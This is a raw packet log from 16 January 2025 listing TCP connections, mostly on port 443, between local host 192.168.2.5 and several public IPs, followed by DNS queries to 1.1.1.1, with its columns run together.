                                                                        Jan 16, 2025 09:20:33.165801048 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:33.165883064 CET49799443192.168.2.5104.18.95.41
                                                                        Jan 16, 2025 09:20:33.166079044 CET49799443192.168.2.5104.18.95.41
                                                                        Jan 16, 2025 09:20:33.166089058 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:33.255013943 CET49800443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.255055904 CET44349800104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.255124092 CET49800443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.255548000 CET49800443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.255565882 CET44349800104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.644095898 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:33.644494057 CET49799443192.168.2.5104.18.95.41
                                                                        Jan 16, 2025 09:20:33.644515991 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:33.644784927 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:33.645176888 CET49799443192.168.2.5104.18.95.41
                                                                        Jan 16, 2025 09:20:33.645176888 CET49799443192.168.2.5104.18.95.41
                                                                        Jan 16, 2025 09:20:33.645190954 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:33.645230055 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:33.697969913 CET49799443192.168.2.5104.18.95.41
                                                                        Jan 16, 2025 09:20:33.731733084 CET44349800104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.732227087 CET49800443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.732254982 CET44349800104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.733367920 CET44349800104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.733444929 CET49800443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.733808994 CET49800443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.733824968 CET49800443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.733875990 CET49800443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.733905077 CET44349800104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.733956099 CET49800443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.734302044 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.734358072 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.734661102 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.734661102 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:33.734700918 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.769078016 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:33.769139051 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:33.770184994 CET49799443192.168.2.5104.18.95.41
                                                                        Jan 16, 2025 09:20:33.770184994 CET49799443192.168.2.5104.18.95.41
                                                                        Jan 16, 2025 09:20:34.077255011 CET49799443192.168.2.5104.18.95.41
                                                                        Jan 16, 2025 09:20:34.077294111 CET44349799104.18.95.41192.168.2.5
                                                                        Jan 16, 2025 09:20:34.223366976 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:34.223809958 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:34.223836899 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:34.224869967 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:34.224946976 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:34.226198912 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:34.226285934 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:34.226433992 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:34.226444006 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:34.270963907 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:35.680222988 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:35.680349112 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:35.680413008 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:35.682589054 CET49806443192.168.2.5104.21.16.1
                                                                        Jan 16, 2025 09:20:35.682607889 CET44349806104.21.16.1192.168.2.5
                                                                        Jan 16, 2025 09:20:35.737421036 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:35.737469912 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:35.737545013 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:35.737734079 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:35.737765074 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:35.737819910 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:35.737941980 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:35.737960100 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:35.738176107 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:35.738188028 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:35.757802010 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:35.757843018 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:35.757915020 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:35.758080959 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:35.758094072 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.220834017 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.221276045 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:36.221302986 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.222758055 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.222826004 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:36.223160982 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:36.223227024 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.223287106 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:36.223293066 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.268398046 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:36.533852100 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.534169912 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.534234047 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.535465002 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.535536051 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.536931038 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.537039042 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.537273884 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.537296057 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.549381018 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.549634933 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.549659014 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.551091909 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.551161051 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.551682949 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.551762104 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.583781958 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.598743916 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.598758936 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.646529913 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.784527063 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.784630060 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.784702063 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:36.788594007 CET49814443192.168.2.5104.21.112.1
                                                                        Jan 16, 2025 09:20:36.788619041 CET44349814104.21.112.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.809122086 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.809231997 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.809272051 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.809381008 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.809427023 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.812062025 CET49812443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:36.812097073 CET4434981220.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:36.834913969 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:36.835009098 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:36.835226059 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:36.835335970 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:36.835355997 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.393487930 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.393805981 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:37.393834114 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.395282984 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.395358086 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:37.395370960 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.395409107 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:37.398168087 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:37.398250103 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.398310900 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:37.398320913 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.443643093 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:37.502907038 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.503251076 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.503308058 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:37.503834009 CET49825443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:37.503855944 CET4434982513.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:37.506553888 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:37.506616116 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.899652004 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.899688959 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.899703026 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.899735928 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.899740934 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:37.899763107 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.899782896 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.899811983 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:37.899851084 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:37.915514946 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.915589094 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:37.916078091 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.916120052 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:37.916140079 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:37.916176081 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:37.930263042 CET49813443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:37.930294991 CET4434981320.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:38.785801888 CET49838443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:38.785820007 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:38.786055088 CET49838443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:38.786767960 CET49838443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:38.786770105 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:38.786788940 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:38.786803961 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:38.789319992 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:38.790324926 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:38.790365934 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:38.798317909 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:38.798353910 CET4434984113.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:38.798643112 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:38.798643112 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:38.798675060 CET4434984113.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:39.349390984 CET4434984113.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:39.349613905 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:39.349641085 CET4434984113.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:39.350501060 CET4434984113.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:39.350553989 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:39.350562096 CET4434984113.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:39.350598097 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:39.350893974 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:39.350935936 CET4434984113.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:39.396529913 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:39.396559954 CET4434984113.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:20:39.444205999 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:20:39.576560020 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:39.597040892 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:39.619496107 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:39.646696091 CET49838443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:39.711208105 CET49838443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:39.711241007 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:39.711306095 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:39.711357117 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:39.711966991 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:39.712470055 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:39.717566013 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:39.717883110 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:39.720396042 CET49838443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:39.720478058 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:39.720629930 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:39.720679998 CET49838443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:39.720706940 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:39.720716953 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.044811964 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.044914007 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.045007944 CET49838443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.045850992 CET49838443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.045874119 CET4434983820.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.085174084 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.085232019 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.085251093 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.085306883 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.085325003 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.085319042 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.085345984 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.085372925 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.085376024 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.085401058 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.085431099 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.097429991 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.097497940 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.097556114 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.097618103 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.097652912 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.097673893 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.161932945 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.161992073 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.162058115 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.162110090 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.162179947 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.162179947 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.162206888 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.162347078 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:40.162408113 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.168193102 CET49839443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:40.168226004 CET4434983920.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:45.900331020 CET4434975223.1.237.91192.168.2.5
                                                                        Jan 16, 2025 09:20:45.900435925 CET49752443192.168.2.523.1.237.91
                                                                        Jan 16, 2025 09:20:52.013641119 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:52.013703108 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:52.013797998 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:52.015775919 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:52.015805006 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:52.812278986 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:52.812658072 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:52.812722921 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:52.813060045 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:52.813352108 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:52.813436031 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:52.813530922 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:52.813530922 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:52.813574076 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:53.177836895 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:53.177953005 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:53.178033113 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:53.178086042 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:53.179558992 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:20:53.179586887 CET4434995720.190.160.14192.168.2.5
                                                                        Jan 16, 2025 09:20:53.179614067 CET49957443192.168.2.520.190.160.14
                                                                        Jan 16, 2025 09:21:14.522097111 CET50060443192.168.2.5142.250.185.68
                                                                        Jan 16, 2025 09:21:14.522172928 CET44350060142.250.185.68192.168.2.5
                                                                        Jan 16, 2025 09:21:14.522245884 CET50060443192.168.2.5142.250.185.68
                                                                        Jan 16, 2025 09:21:14.522506952 CET50060443192.168.2.5142.250.185.68
                                                                        Jan 16, 2025 09:21:14.522522926 CET44350060142.250.185.68192.168.2.5
                                                                        Jan 16, 2025 09:21:15.180608988 CET44350060142.250.185.68192.168.2.5
                                                                        Jan 16, 2025 09:21:15.181029081 CET50060443192.168.2.5142.250.185.68
                                                                        Jan 16, 2025 09:21:15.181093931 CET44350060142.250.185.68192.168.2.5
                                                                        Jan 16, 2025 09:21:15.181581020 CET44350060142.250.185.68192.168.2.5
                                                                        Jan 16, 2025 09:21:15.182035923 CET50060443192.168.2.5142.250.185.68
                                                                        Jan 16, 2025 09:21:15.182125092 CET44350060142.250.185.68192.168.2.5
                                                                        Jan 16, 2025 09:21:15.223747015 CET50060443192.168.2.5142.250.185.68
                                                                        Jan 16, 2025 09:21:20.717314005 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:20.717406988 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:20.717489958 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:20.717834949 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:20.717868090 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.379817009 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.380822897 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.380845070 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.382658005 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.382739067 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.384110928 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.384196997 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.384290934 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.384300947 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.426969051 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.644972086 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.645088911 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.645143986 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.645327091 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.645351887 CET443500612.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.645365000 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.645395994 CET50061443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.646390915 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.646506071 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:21.646576881 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.646790028 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:21.646822929 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:22.277972937 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:22.278387070 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:22.278455973 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:22.278937101 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:22.279369116 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:22.279473066 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:22.279520988 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:22.279552937 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:22.279571056 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:23.161797047 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:23.161880016 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:23.162317991 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:23.162317991 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:23.162389994 CET443500622.18.64.215192.168.2.5
                                                                        Jan 16, 2025 09:21:23.162472010 CET50062443192.168.2.52.18.64.215
                                                                        Jan 16, 2025 09:21:24.411011934 CET49841443192.168.2.513.107.6.156
                                                                        Jan 16, 2025 09:21:24.411072016 CET4434984113.107.6.156192.168.2.5
                                                                        Jan 16, 2025 09:21:25.118349075 CET44350060142.250.185.68192.168.2.5
                                                                        Jan 16, 2025 09:21:25.118547916 CET44350060142.250.185.68192.168.2.5
                                                                        Jan 16, 2025 09:21:25.118618011 CET50060443192.168.2.5142.250.185.68
                                                                        Jan 16, 2025 09:21:26.366081953 CET50060443192.168.2.5142.250.185.68
                                                                        Jan 16, 2025 09:21:26.366149902 CET44350060142.250.185.68192.168.2.5
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 16, 2025 09:20:09.987910986 CET53584711.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:10.166610003 CET53646471.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:11.201395988 CET53566501.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:14.458858013 CET5298353192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:14.458915949 CET6471553192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:14.465795994 CET53529831.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:14.465841055 CET53647151.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:15.745831013 CET5165153192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:15.746607065 CET6252153192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:15.764837980 CET53625211.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:15.807476044 CET53516511.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:17.341866016 CET5325853192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:17.342114925 CET5581453192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:17.342549086 CET5335853192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:17.342740059 CET6032053192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:17.343058109 CET5068753192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:17.347985983 CET6355953192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:17.349164009 CET53532581.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:17.349179983 CET53558141.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:17.349185944 CET53533581.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:17.349462986 CET53603201.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:17.349514008 CET53506871.1.1.1192.168.2.5
